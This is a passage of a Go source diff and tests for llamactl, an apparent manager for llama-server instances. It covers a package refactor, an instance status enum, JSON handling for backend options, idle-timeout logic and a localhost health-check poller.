Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"status": "running",
"options": {
"auto_restart": false,
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}


@@ -1,9 +1,10 @@
-package llamactl
+package instance

 import (
 	"context"
 	"fmt"
 	"log"
+	"net/http"
 	"os/exec"
 	"runtime"
 	"syscall"
@@ -11,11 +12,11 @@ import (
 )

 // Start starts the llama server instance and returns an error if it fails.
-func (i *Instance) Start() error {
+func (i *Process) Start() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()

-	if i.Running {
+	if i.IsRunning() {
 		return fmt.Errorf("instance %s is already running", i.Name)
 	}
@@ -30,13 +31,15 @@ func (i *Instance) Start() error {
 		i.restarts = 0
 	}

+	// Initialize last request time to current time when starting
+	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
+
 	// Create log files
 	if err := i.logger.Create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}

 	args := i.options.BuildCommandArgs()
 	i.ctx, i.cancel = context.WithCancel(context.Background())
 	i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -61,7 +64,7 @@ func (i *Instance) Start() error {
 		return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
 	}

-	i.Running = true
+	i.SetStatus(Running)

 	// Create channel for monitor completion signaling
 	i.monitorDone = make(chan struct{})
@@ -75,10 +78,10 @@ func (i *Instance) Start() error {
 }

 // Stop terminates the subprocess
-func (i *Instance) Stop() error {
+func (i *Process) Stop() error {
 	i.mu.Lock()

-	if !i.Running {
+	if !i.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if i.restartCancel != nil {
 			i.restartCancel()
@@ -95,8 +98,8 @@ func (i *Instance) Stop() error {
 		i.restartCancel = nil
 	}

-	// Set running to false first to signal intentional stop
-	i.Running = false
+	// Set status to stopped first to signal intentional stop
+	i.SetStatus(Stopped)

 	// Clean up the proxy
 	i.proxy = nil
@@ -106,19 +109,25 @@ func (i *Instance) Stop() error {
 	i.mu.Unlock()

-	// Stop the process with SIGINT
-	if i.cmd.Process != nil {
+	// Stop the process with SIGINT if cmd exists
+	if i.cmd != nil && i.cmd.Process != nil {
 		if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
 		}
 	}

+	// If no process exists, we can return immediately
+	if i.cmd == nil || monitorDone == nil {
+		i.logger.Close()
+		return nil
+	}
+
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
-		if i.cmd.Process != nil {
+		if i.cmd != nil && i.cmd.Process != nil {
 			killErr := i.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,7 +149,85 @@ func (i *Instance) Stop() error {
 	return nil
 }

-func (i *Instance) monitorProcess() {
+func (i *Process) LastRequestTime() int64 {
+	return i.lastRequestTime.Load()
+}
+
+func (i *Process) WaitForHealthy(timeout int) error {
+	if !i.IsRunning() {
+		return fmt.Errorf("instance %s is not running", i.Name)
+	}
+
+	if timeout <= 0 {
+		timeout = 30 // Default to 30 seconds if no timeout is specified
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
+	defer cancel()
+
+	// Get instance options to build the health check URL
+	opts := i.GetOptions()
+	if opts == nil {
+		return fmt.Errorf("instance %s has no options set", i.Name)
+	}
+
+	// Build the health check URL directly
+	var host string
+	var port int
+	switch opts.BackendType {
+	case "llama-cpp":
+		host = opts.LlamaServerOptions.Host
+		port = opts.LlamaServerOptions.Port
+	}
+	if host == "" {
+		host = "localhost"
+	}
+	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
+
+	// Create a dedicated HTTP client for health checks
+	client := &http.Client{
+		Timeout: 5 * time.Second, // 5 second timeout per request
+	}
+
+	// Helper function to check health directly
+	checkHealth := func() bool {
+		req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
+		if err != nil {
+			return false
+		}
+		resp, err := client.Do(req)
+		if err != nil {
+			return false
+		}
+		defer resp.Body.Close()
+		return resp.StatusCode == http.StatusOK
+	}
+
+	// Try immediate check first
+	if checkHealth() {
+		return nil // Instance is healthy
+	}
+
+	// If immediate check failed, start polling
+	ticker := time.NewTicker(1 * time.Second)
+	defer ticker.Stop()
+
+	for {
+		select {
+		case <-ctx.Done():
+			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
+		case <-ticker.C:
+			if checkHealth() {
+				return nil // Instance is healthy
+			}
+			// Continue polling
+		}
+	}
+}
+
+func (i *Process) monitorProcess() {
 	defer func() {
 		i.mu.Lock()
 		if i.monitorDone != nil {
@@ -155,12 +242,12 @@ func (i *Instance) monitorProcess() {
 	i.mu.Lock()

 	// Check if the instance was intentionally stopped
-	if !i.Running {
+	if !i.IsRunning() {
 		i.mu.Unlock()
 		return
 	}

-	i.Running = false
+	i.SetStatus(Stopped)
 	i.logger.Close()

 	// Cancel any existing restart context since we're handling a new exit
@@ -181,10 +268,11 @@ func (i *Instance) monitorProcess() {
 }

 // handleRestart manages the restart process while holding the lock
-func (i *Instance) handleRestart() {
+func (i *Process) handleRestart() {
 	// Validate restart conditions and get safe parameters
 	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
 	if !shouldRestart {
+		i.SetStatus(Failed)
 		i.mu.Unlock()
 		return
 	}
@@ -223,7 +311,7 @@ func (i *Instance) handleRestart() {
 }

 // validateRestartConditions checks if the instance should be restarted and returns the parameters
-func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
+func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
 	if i.options == nil {
 		log.Printf("Instance %s not restarting: options are nil", i.Name)
 		return false, 0, 0
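
The added WaitForHealthy helper polls the backend's /health endpoint until it returns 200 OK or the timeout elapses. A minimal caller sketch (illustrative only; the surrounding setup and error handling are assumed and not part of this diff):

	// Assumes an existing *instance.Process named inst.
	if err := inst.Start(); err != nil {
		log.Fatalf("start failed: %v", err)
	}
	// Block until llama-server reports healthy, giving up after 60 seconds
	// (a zero or negative value falls back to the 30-second default).
	if err := inst.WaitForHealthy(60); err != nil {
		log.Printf("instance %s never became healthy: %v", inst.Name, err)
	}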


@@ -1,4 +1,4 @@
-package llamactl
+package instance

 import (
 	"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
 }

 // GetLogs retrieves the last n lines of logs from the instance
-func (i *Instance) GetLogs(num_lines int) (string, error) {
+func (i *Process) GetLogs(num_lines int) (string, error) {
 	i.mu.RLock()
 	logFileName := i.logger.logFilePath
 	i.mu.RUnlock()

pkg/instance/options.go Normal file

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}
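
The custom MarshalJSON/UnmarshalJSON pair keeps backend_options as a plain JSON map on the wire while exposing a typed LlamaServerOptions struct in Go. A small round-trip sketch from a caller's perspective (illustrative only; it mirrors the JSON shape exercised by the tests above):

	raw := []byte(`{
		"backend_type": "llama_cpp",
		"backend_options": {"model": "/path/to/model.gguf", "port": 8080}
	}`)
	var opts instance.CreateInstanceOptions
	if err := json.Unmarshal(raw, &opts); err != nil {
		log.Fatal(err) // unknown backend_type values are rejected here
	}
	fmt.Println(opts.LlamaServerOptions.Model) // typed access: /path/to/model.gguf
	out, _ := json.Marshal(&opts) // folds LlamaServerOptions back into backend_options
	fmt.Println(string(out))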


@@ -1,6 +1,6 @@
 //go:build !windows

-package llamactl
+package instance

 import (
 	"os/exec"


@@ -1,6 +1,6 @@
 //go:build windows

-package llamactl
+package instance

 import "os/exec"

pkg/instance/status.go Normal file

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}
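
Statuses serialize as lowercase strings, and an unknown string decodes to Stopped instead of failing the decode. A quick sketch of the round trip from a caller outside the package (not part of the diff):

	b, _ := json.Marshal(instance.Running) // yields "running"
	var s instance.InstanceStatus
	_ = json.Unmarshal([]byte(`"paused"`), &s) // logs "Unknown instance status", s == instance.Stopped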

pkg/instance/timeout.go Normal file

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}
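
ShouldTimeout works in whole seconds: the minute-based IdleTimeout is multiplied by 60 and compared against now minus the last request timestamp. The same arithmetic in sketch form (hypothetical values for illustration):

	// With *IdleTimeout == 5 (minutes):
	idleTimeoutSeconds := int64(5 * 60)           // 300
	elapsed := now.Unix() - lastRequest           // e.g. 301 seconds idle
	shouldTimeout := elapsed > idleTimeoutSeconds // true once idle exceeds 5 minutes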


@@ -0,0 +1,220 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}


@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
